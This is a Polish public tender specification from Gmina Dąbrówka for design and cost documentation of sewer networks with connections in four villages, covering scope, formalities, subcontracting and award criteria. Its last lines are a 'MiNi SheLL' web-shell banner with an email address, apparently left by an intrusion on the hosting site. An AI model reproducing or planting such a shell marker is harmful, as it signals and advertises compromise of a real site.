Zamawiający załącza do SIWZ poglądowe szkice proponowanego przebiegu sieci kanalizacyjnej i Program Gospodarki Ściekowej dla Gminy Dąbrówka do ewentualnego wykorzystania przez Wykonawców przy ocenie zakresu zamówienia.
3.1. Zakres prac projektowych obejmuje opracowanie dla każdego zadania:
a) podkładów mapowych do celów projektowych,
b) projektu budowlanego -5 egz. w zakresie niezbędnym do złożenia wniosku i uzyskaniu przez  Wykonawcę decyzji pozwolenia na budowę , 
c) projektu wykonawczego  w rozbiciu na branże - 5  egz.,
d) specyfikacji technicznej wykonania i odbioru robót - 2 egz.,  
e) przedmiarów robót  -2 egz. z podziałem na sieć grawitacyjną do granicy działek, kanalizację tłoczną z przepompowniami ścieków  oraz oddzielnie na przyłącza kanalizacyjne na odcinku od granicy nieruchomości do istniejącego lub projektowanego w raz z ze zbiorczym zestawieniem przyłączy (nr działki, właściciel, długość przyłącza, ilość studzienek kanalizacyjnych, szamba przewidziane do likwidacji ).   
Przedmiar robót musi obejmować zestawienie wszystkich robót wynikających z projektu.
Poszczególne działania opisane w przedmiarze muszą być podzielone na grupy robót wg takiego podziału jaki jest przyjęty w STWiORB. 
Przedmiar będzie stanowił podstawę do wyliczenia ceny przez Wykonawcę robót budowlanych w zamówieniu publicznym na realizację zadań, dlatego Zamawiający wymaga, aby był on sporządzony w układzie tabelarycznym zgodnym z § 10 Rozporządzenia Ministra Infrastruktury (Dz.U.2004.202.2072) oraz dodatkowo uzupełniony o kolumny cena jednostkowa i wartość,
f) kosztorysów inwestorskich- 2 egz. ( na podstawie przedmiarów) z podaniem nazw i kodów określonych we wspólnym słowniku zamówień, 
g) sporządzenie operatów wodno - prawnych i uzyskanie zgody na przejście pod ciekami wodnymi wraz z uzyskaniem pozwolenia wodno - prawnego - jeśli będzie wymagane,
h) przeprowadzenie procedury oceny oddziaływania na środowisko przedsięwzięcia wraz z przygotowaniem wniosku i niezbędnych załączników do wydania decyzji o środowiskowych uwarunkowaniach realizacji przedsięwzięcia (tj. raport oddziaływania na środowisko, przebieg sieci wkreślony na mapach ewidencyjnych, itd.) - jeśli będzie wymagane, 
i) uzyskanie wszelkich koniecznych warunków, decyzji, zgód, opinii oraz uzgodnień branżowych - w formie pisemnej i elektronicznej, 
3.2. Forma  opracowań:
a) dokumentacja projektowa, przedmiary robót i kosztorys inwestorski  w formie papierowej  i  na nośniku CD w formacie umożliwiającym ich odczyt i drukowanie przy wykorzystaniu bezpłatnego oprogramowania.
b) przynajmniej 2 egz. projektu budowlanego muszą być opieczętowane przez organ wydający pozwolenie na budowę.
c) wykonawca  przystąpi do końcowej edycji dokumentacji projektowej po uzgodnieniu jej z Zamawiającym i Zakładem Gospodarki Komunalnej w Dąbrówce,
d) wykonawca zobowiązany jest do sporządzenia wersji przetargowej projektu oraz przedmiaru robót w sposób określony w art. 29-31 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (t. j. Dz. U. z 2015 r. poz. 2164 z późn.zm.)
3.3 Wykonawca zobowiązany jest do:
a) uzyskania zgody właścicieli, współwłaścicieli lub spadkobierców nieruchomości w formie oświadczeń pisemnych na przejście z projektowaną siecią kanalizacyjną  przez ich teren i ustanowienia służebności przesyłu na rzecz Gminy Dąbrówka,
b) uzyskanie zgody właścicieli, współwłaścicieli lub spadkobierców nieruchomości w formie oświadczeń pisemnych wraz załącznikiem graficznym z przedstawiającym lokalizacje sieci i przyłącza oraz zgodę lub odmowę na wykonanie sieci i przyłącza kanalizacyjnego, 
c) sporządzenie wykazu działek po których przebiega sieć kanalizacyjna oraz wykazu działek, dla których projektuje się przyłącza kanalizacyjne ( z wykazem właścicieli/zarządców),
d) wykonanie inwentaryzacji zieleni oraz wskazanie drzew przewidzianych do usunięcia/przesadzenia, które kolidują z projektowaną siecią kanalizacyjną,  
e)  uzyskania z upoważnienia zamawiającego decyzji udzielającej inwestorowi pozwolenia na budowę.
3.4.  Wszelkie opłaty administracyjne ponoszone w wyniku prowadzonych działań związanych z uzyskiwaniem opinii, badań, uzgodnień czy decyzji, wykonawca winien wliczyć do ceny opracowania dokumentacji projektowej w tym min.:
a) Uzyskania aktualnych podkładów geodezyjnych do celów projektowych.
b) Uzyskanie wypisów z miejscowego planu zagospodarowania  orz wypisów z rejestru gruntów
c) Wykonania badań geologicznych i dokumentacji przy założeniu wykonywania otworów pod każdą przepompownię ścieków oraz na trasie kanału grawitacyjnego w zależności od potrzeb, jednak nie mniej niż 1 otwór  na każdy rozpoczęty kilometr kanalizacji grawitacyjnej.
d) Opracowanie projektu organizacji ruchu na czas budowy- jeśli będzie wymagany
e) Przygotowanie wniosku o określenie warunków przyłączenia do sieci elektroenergetycznej przepompowni ścieków 
f) Opracowanie instrukcji zasilenia rezerwowego przepompowni agregatem prądotwórczym 
g) Uzyskania wszelkich nie wymienionych wyżej, a koniecznych dokumentów formalno-prawnych i pokrewnych, własnym staraniem.
W celu prawidłowego sporządzenia oferty Wykonawca winien przeprowadzić szczegółową wizję lokalną w celu uzyskania wszystkich niezbędnych informacji, co do ryzyka, trudności 
i wszelkich innych okoliczności, jakie mogą wystąpić.
3.5. Stan aktualny
a)	Miejscowości przewidziane do zaprojektowania sieci kanalizacyjnej objęte są miejscowym planem zagospodarowania przestrzennego. 
b)	Sieć i urządzenia kanalizacyjne będą zlokalizowane w pasie dróg  powiatowych i gminnych oraz na działkach prywatnych.  
c)	Uzbrojenie terenu: sieć gazowa i wodociągowa z przyłączami, przewody energetyczne 
napowietrzne i  kablowe oraz telekomunikacyjne. 
3.6. Pomoc techniczna 
Na etapie postępowania mającego na celu wybór wykonawcy robót: "Budowa sieci kanalizacyjnej wraz z przyłączami w miejscowościach Chajęty, Guzowatka, Trojany i Zaścienie" projektant będzie współpracował z zamawiającym w zakresie odpowiedzi na pytania wykonawców związane z Projektem Budowlanym i Wykonawczym. Wykonawca zobowiązany będzie do pełnienia nadzoru autorskiego w czasie trwania prac budowlanych, tj. od chwili rozpoczęcia robót do odbioru końcowego. Umowa na pełnienie nadzoru autorskiego zostanie zawarta z wykonawcą na oddzielnych zasadach
Kody Wspólnego Słownika Zamówień:
 71320000-7	Usługi inżynieryjne w zakresie projektowania
71248000-8   Nadzór nad projektem i dokumentacją
2. Zamawiający dopuszcza możliwość składania ofert częściowych na jedną lub większą liczbę wymienionych w niniejszej specyfikacji części zamówienia - zadania od 1 do 2. 
2.1 Przedmiot zamówienia w zakresie zadania nr 1 dotyczy Dokumentacja projektowo - kosztorysowa sieci kanalizacji sanitarnej grawitacyjnej i tłocznej wraz z przyłączami kanalizacyjnymi dla miejscowości: Chajęty i Guzowatka. .
Zgodnie z opisem przedmiotu zamówienia w pkt. 1

2.2 Przedmiot zamówienia w zakresie zadania nr 2 dotyczy Dokumentacja projektowo - kosztorysowa sieci kanalizacji sanitarnej grawitacyjnej i tłocznej wraz z przyłączami kanalizacyjnymi dla miejscowości: Trojany i Zaścienie.
Zgodnie z opisem przedmiotu zamówienia w pkt. 1


3. Zamawiający nie dopuszcza możliwości składania ofert wariantowych

4. Przedmiotem niniejszego postępowania nie jest zawarcie umowy ramowej

5. Zamawiający nie dopuszcza możliwości udzielenia zamówień uzupełniających.
6. Informacja na temat możliwości powierzenia przez wykonawcę wykonania części zamówienia podwykonawcom:
6.1 Zamawiający nie wprowadza zastrzeżenia wskazującego na obowiązek osobistego wykonania przez Wykonawcę kluczowych części zamówienia. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy.
6.2 W przypadku powierzenia wykonania części zamówienia podwykonawcy, Wykonawca zobowiązany jest do wykazania w formularzu ofertowym części zamówienia, której wykonanie zamierza powierzyć podwykonawcom.
6.3 Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych w pkt. 5.3 niniejszej Specyfikacji (art. 22a ust. 1 ustawy Pzp.), w celu wykazania spełniania warunków udziału w postępowaniu, wykonawca jest obowiązany wykazać zamawiającemu, że proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca, na którego zasoby zamawiający powoływał się w trakcie postępowania o udzielenie zamówienia. 
6.4 Wykonawca zobowiązany będzie przedstawić na wezwanie zamawiającego dokumenty, o których mowa w pkt. 7.2. ppkt. 1 - 9 w odniesieniu do podwykonawców.
6.5 Jeżeli powierzenie podwykonawcy wykonania części zamówienia na roboty budowlane lub usługi następuje w trakcie jego realizacji, wykonawca na żądanie zamawiającego przedstawi oświadczenie, o którym mowa w art. 25a ust. 1 ustawy Pzp lub oświadczenia lub dokumenty potwierdzające brak podstaw wykluczenia wobec tego podwykonawcy. Obowiązek ten   nie dotyczy dalszych  podwykonawców.  
6.6 Jeżeli zamawiający stwierdzi, że wobec danego podwykonawcy zachodzą podstawy wykluczenia, wykonawca obowiązany jest zastąpić tego podwykonawcę lub zrezygnować z powierzenia wykonania części zamówienia podwykonawcy.
6.7 Powierzenie wykonania części zamówienia podwykonawcom nie zwalnia wykonawcy z odpowiedzialności za należyte wykonanie zamówienia.
7. Wymagania stawiane wykonawcy:
7.1 Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia. 
7.2 Wymagana jest należyta staranność przy realizacji zobowiązań umowy, 
7.3 Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem wykonawcy. 
7.4 Określenie przez wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia. 
7.5 Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez wykonawcę podczas wykonywania przedmiotu zamówienia. 

9 Wymagania organizacyjne
Nie dotyczy

10 Wymagania dot. gwarancji
     Nie dotyczy
10.1 Wymagania dot. rękojmi
 Zamawiający wspólnie z Wykonawcą dokumentacji projektowo-kosztorysowej rozszerzają odpowiedzialność Wykonawcy dokumentacji projektowo-kosztorysowej z tytułu rękojmi za wady fizyczne przedmiotu umowy. Termin rękojmi skończy się wraz z upływem  terminu odpowiedzialności z tytułu rękojmi za wady Wykonawcy robót budowlanych wykonywanych na podstawie dokumentacji będącej przedmiotem niniejszej umowy.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7, 71248000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Doświadczenie</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com